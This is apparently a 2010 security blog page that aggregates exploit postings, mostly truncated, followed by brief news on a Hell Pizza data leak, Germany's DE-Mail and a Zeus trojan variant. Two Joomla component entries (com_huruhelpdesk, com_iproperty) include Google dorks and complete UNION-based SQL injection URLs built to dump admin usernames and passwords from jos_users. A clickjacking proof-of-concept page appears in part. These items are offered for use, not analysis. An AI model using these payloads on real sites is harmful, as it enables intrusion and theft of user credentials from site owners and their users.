Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

Entries for July 23rd, 2010

libpng <= 1.4.2 Denial of Service Vulnerability

/*
Exploit Title: libpng <= 1.4.2 DoS
Date: [...]

RapidLeech Scrits Remote File Upload (transfer & run shell php)

# Exploit Title: RapidLeech Scrits Remote File Upload ( transfer & run shell php )
# Date: 21/07/2010
# Author: H-SK33PY
# [...]

Imagine-cms <= 2.50 SQL Injection Exploit Vulnerability

#!/usr/bin/perl
###########################################
#
# Script Name : Imagine-cms 2.50
#
# Version : 2.50
#
# Bug Type : SQL Injection
#
# Found by : Metropolis
#
# Home : http://metropolis.fr.cr
#
# Discovered : 21/07/2010
#
# [...]

WordPress Plugin myLDlinker SQL Injection Vulnerability

ZeeAdbox v2x SQL injection Vulnerabilty

ZeeNetworking v1x Arbitrary File Upload Vulnerability

ZeeMatri v3x Arbitrary File Upload Vulnerability

ZeeClassifieds v1x Multiple Vulnerabilty

Joomla com_properties Persistent XSS Vulnerability

Joomla com_jomestate Persistent XSS Vulnerability

Joomla Component com_estateagent Persistent XSS Vulnerability

PhotoPost PHP SQL Injection Vulnerability

# Exploit Title: PhotoPost PHP SQL Injection Vulnerability
# Date: 23/07/2010
# Author: Cyber-sec
# Software Link: www.photopost.com
# Version: 4.0 – 4.6
# Tested on: windows xp pack 3
# CVE : N/A
————————–exploit——————————
dork : [...]

PHP Login Script v 2.3 SQL Injection vulnerability

# Exploit Title: PHP Login Script v 2.3 SQL Injection vulnerability.
# Date: 23/7 2010
# Author: pimpim – pyscripter94@gmail.com
# Software Link: http://php-login-script.com/php_login_v2.3.zip
# Version: 2.3
# [...]

Joomla Component com_golfcourseguide SQL Injection Vulnerability

# Exploit Title: Joomla Component com_golfcourseguide SQL Injection Vulnerability
# Date: 23.07.2010
# Author: Valentin
# Category: webapps/0day
# Version: v0.9.6.0 beta, v1 beta
# Tested on:
# CVE :
# Code :
[:::::::::::::::::::::::::::::::::::::: 0x1 [...]

Joomla Component com_huruhelpdesk SQL Injection Vulnerability

Author : Amine_92
Email : [amine92_16@hotmail.fr]
Homepage : { www.vbhacker.net/vb }
DORK : inurl:"index.php?option=com_huruhelpdesk"
===================================================
[+] Vulnerable File :
http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=[SQL]
[+] ExploiT :
-1/**/union/**/select/**/1,2,3,concat%28username,0×3a,password%29,5,6,7+from+jos_users–
[+] Example :
http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat%28username,0×3a,password%29,5,6,7+from+jos_users–
[+] Demo :
http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat%28username,0×3a,password%29,5,6,7+from+jos_users–
====================================================
Thank’s [...]

Joomla Component com_iproperty SQL Injection Vulnerability

Author : Amine_92
Email : amine92_16@hotmail.fr
Homepage : www.vbhacker.net/vb
DORK : inurl:"index.php?option=com_iproperty"
====================================================
[+] Vulnerable File :
http://www.site.com/index.php?option=com_iproperty&view=agentproperties&id=[SQL]
[+] ExploiT :
index.php?option=com_iproperty&view=agentproperties&id=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users–
[+] Example :
http://www.victime.com/index.php?option=com_iproperty&view=agentproperties&id=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users–
====================================================
la illaha ila la mohamed [...]

Clickjacking Web Browser Multiple Vulnerability (FF3.6.7/SM 2.0.6)

&lt;html&gt;&lt;head&gt;
&lt;meta http-equiv=&quot;content-type&quot; content=&quot;text/html; charset=UTF-8&quot;&gt;
&lt;title&gt;FF3.6.7/SM 2.0.6 ClickJacking Vulnerability&lt;/title&gt;
&lt;/head&gt;&lt;body&gt;
&lt;div id=&quot;mydiv&quot; onmouseover=&quot;document.location=’http://www.mozilla.org’;&quot; style=&quot;border: 0px none ; background: rgb(0, 0, 0) none repeat scroll 0% 0%; position: absolute; width: [...]

Hell Pizza customer database compromised?

Security website Risky.Biz claims that Hell Pizza’s online customer database has been compromised, resulting in the leak of customer names, addresses, phone numbers, email addresses and even passwords.
The issue first surfaced on Geekzone back in August 2009 when forumgoers claimed that email addresses used only for Hell Pizza orders were receiving unrelated spam. However, the [...]

Critics point to cracks in proposed German encrypted e-mail system

Some German IT experts are raising doubts about Germany’s DE-Mail encryption system by pointing to what they call a security problem in the proposed e-mail network, which was opened to the public for registration earlier this month.
E-mail sent through DE-Mail’s servers may be decrypted and re-encrypted up to two times before reaching its target, possibly [...]

Hackers Develop New Version of Zeus Bank Trojan

According to the security firm Computer Associates (CA), hackers have developed a new version of the Zeus crimeware toolkit. The researchers have named this new toolkit 'Zeus version 3'.
The new Zeus program configuration includes a list of targeted financial organizations in Germany, Spain, the USA and the United Kingdom. The preceding versions [...]